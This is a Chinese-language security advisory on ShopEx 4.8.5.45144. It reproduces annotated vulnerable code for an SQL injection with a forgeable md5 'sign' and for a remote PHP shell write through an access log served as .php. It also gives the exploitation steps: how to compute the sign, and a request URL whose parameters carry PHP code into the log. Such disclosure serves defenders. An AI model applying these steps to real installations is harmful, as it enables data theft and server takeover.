ShopEx 网上商店平台软件系统(又称网店管理系统、网店程序、网上购物系统、在线购物系统)。本文是 shopex 4.8.5.45144 注入和远程 shell 写入漏洞预警。
一:shopex 4.8.5.45144 \core\include_v5\shopCore.php 注入漏洞
\core\include_v5\shopCore.php
// Constructor (ShopEx 4.8.5.45144, core/include_v5/shopCore.php).
// Security note: a POST carrying a 'spgdif' field is routed straight into
// spgdif() and the request is terminated afterwards, so the stats-export
// path is reachable before any of the regular front-controller logic below.
// Nothing visible here authenticates the caller; whether parent::kernel()
// does is not shown. (Gutter numbers are from the original listing; "...."
// marks code the advisory author elided.)
01 public function shopCore( )
02 {
03 parent::kernel( );
04 if ( isset( $_POST['spgdif'] ) ) // trigger is attacker-controlled: only presence is tested, the value is irrelevant
05 {
06 $this->spgdif( ); // enters the stats-export handler with the raw POST body
07 exit( );          // response ends here; nothing after this runs for such requests
08 }
09 ............................
10 }
// spgdif(): handler for the stats-export request dispatched from the
// constructor. The listing is cut after line 23 by the advisory author;
// the closing of the if-blocks and any further logic is not visible here.
11 public function spgdif( )
12 {
13 include_once( CORE_DIR."/func_ext.php" );
14 if ( $_POST['session'] && $_POST['query'] && $_POST['sign'] ) // only truthiness is tested: no filtering, no type or length check on any of the three
15 {
// The "signature" is md5(query . session . "shopex_stats"): the suffix is a
// fixed, publicly known string and no secret enters the hash, so the caller
// can compute a valid sign for any query/session pair it likes. This is an
// integrity tag at best, not authentication. Loose == also admits numeric
// "magic hash" juggling; an HMAC keyed with a per-install secret, compared
// via hash_equals(), is what this check should be.
16 if ( md5( $_POST['query'].$_POST['session']."shopex_stats" ) == $_POST['sign'] )
17 {
18 $cert = $this->loadModel( "service/certificate" );
19 if ( $data = $cert->session_vaild( $_POST['session'] ) ) // the only remaining gate; session_vaild() is not shown here -- the advisory's working exploit implies an attacker-supplied value satisfies it, confirm in service/certificate
20 {
21 $this->fetchdata( $_POST['query'] ); // the raw POST string (a serialized PHP array, see fetchdata) is passed through unchanged
22 }
23 ..........................
// fetchdata(): builds and runs a SELECT from a caller-supplied serialized
// PHP array and prints the result as JSON. It is reached from spgdif() with
// the raw POST 'query' string, so every value used below is attacker-chosen.
// (Gutter numbers are from the original listing; "...." marks code the
// advisory author elided -- most likely the WHERE/GROUP/ORDER part, but that
// is not visible here.)
24 public function fetchdata( $params )
25 {
26 $params = unserialize( $params ); // unserialize() on untrusted input: PHP object injection on top of the SQL problem; json_decode() is the safe decoder for this
27 $sql = "SELECT ";
28 foreach ( $params['fields'] as $key => $value )
29 {
30 $sql .= $value['method']."(".$value['name'].")"; // 'method' and 'name' are concatenated verbatim: no identifier whitelist, no quoting
31 if ( $value['alias'] )
32 {33 $sql .= " as ".$value['alias']; // alias goes into the SQL the same way
34 }
35 $sql .= ",";
36 }
37 $sql = substr( $sql, 0, -1 ); // drop the trailing comma
38 $sql .= " FROM ".$params['tbl']." "; // table name is attacker-chosen too: any table the DB account can read
39 ...............
40 $db = $this->database( );
41 ob_start( ); // hides whatever the DB layer prints (warnings, error text); it does nothing to make the query safe
42 $data = $db->select( $sql ); // raw string query -- no prepared statement or escaping anywhere on this path
43 ob_end_clean( );
44 if ( $data )
45 {
46 echo json_encode( array(
47 "res" => "succ",
48 "data" => $data // the full result set is returned as-is (the advisory's point: no blind extraction needed)
49 ) );
50 }
51 else
52 {
53 echo json_encode( array(
54 "res" => "fail",
55 "data" => $sql // on failure the generated SQL is echoed back to the caller: a free oracle for tuning a payload
56 ) );
57 }
58 }
利用代码 exp(exploit.htm,本页未附带;其核心只是按上面第 16 行的公式自行计算 sign = md5(query . session . "shopex_stats"),其中 query 为序列化的 PHP 数组):
exploit.htm
-----
shopex 4.8.5 SQL Injection Vulnerability 0day — 2010.06.12
By:qing
QQ:33089632
二:shopex 4.8.5.45144 \core\include_v5\crontab.php 远程shell写入漏洞
\core\include_v5\crontab.php(原文件经 Zend 加密,此处只给出解密后的代码)
/**
 * Cron entry point (core/include_v5/crontab.php).
 *
 * Stamps the current time, points the access log at
 * HOME_DIR/logs/access.log.php, records the hit via viewStat() and
 * finally drains the messenger queue.
 *
 * Security note (review): the log is created under HOME_DIR with a .php
 * extension. If that directory is served by the web server -- the advisory's
 * URL .../shopex/home/logs/access.log.php suggests it is -- anything
 * viewStat() appends from request parameters is executed as PHP the next
 * time the file is requested. Keep logs outside the document root, or at
 * minimum start the file with `<?php exit; ?>` so appended bytes never run;
 * the original only writes a bare "#\n", which is not a PHP guard.
 */
public function run( )
{
    $this->now = time( );
    $this->logFile = HOME_DIR . '/logs/access.log.php';
    $this->viewStat( );
    $messenger =& $this->loadModel( 'system/messenger' );
    $messenger->runQueue( );
}
09
// viewStat(): appends one line per request that carries ?action=... to the
// log file configured in run(). The listing is cut after line 18 by the
// advisory author, so the rest of the method is not visible here.
10 public function viewStat( )
11 {
12 if ( !file_exists( $this->logFile ) )
13 {
14 file_put_contents( $this->logFile, "#\n" ); // the "awkward spot": "#" is not a PHP open tag, so this header does nothing to stop the file from executing; a `<?php exit; ?>` first line would
15 }
16 if ( isset( $_GET['action'] ) )
17 {
18 error_log( $this->now."\t".$_GET['action']."\t".$_GET['p']."\n", 3, $this->logFile ); // mode 3 appends the message verbatim: action and p are written unescaped (p is not even isset-checked), so any PHP tags in them land in a .php file that, per the advisory, is web-reachable
利用:
直接提交:http://127.0.0.1/shopex/?cron=1&action=1&p=1(action、p 两个参数的内容会被原样追加到日志文件,把 PHP 代码放在这两个参数里即可)
写入的日志文件位于:http://127.0.0.1/shopex/home/logs/access.log.php,由于文件扩展名为 .php 且位于 Web 目录下,追加进去的代码会在访问该 URL 时被执行。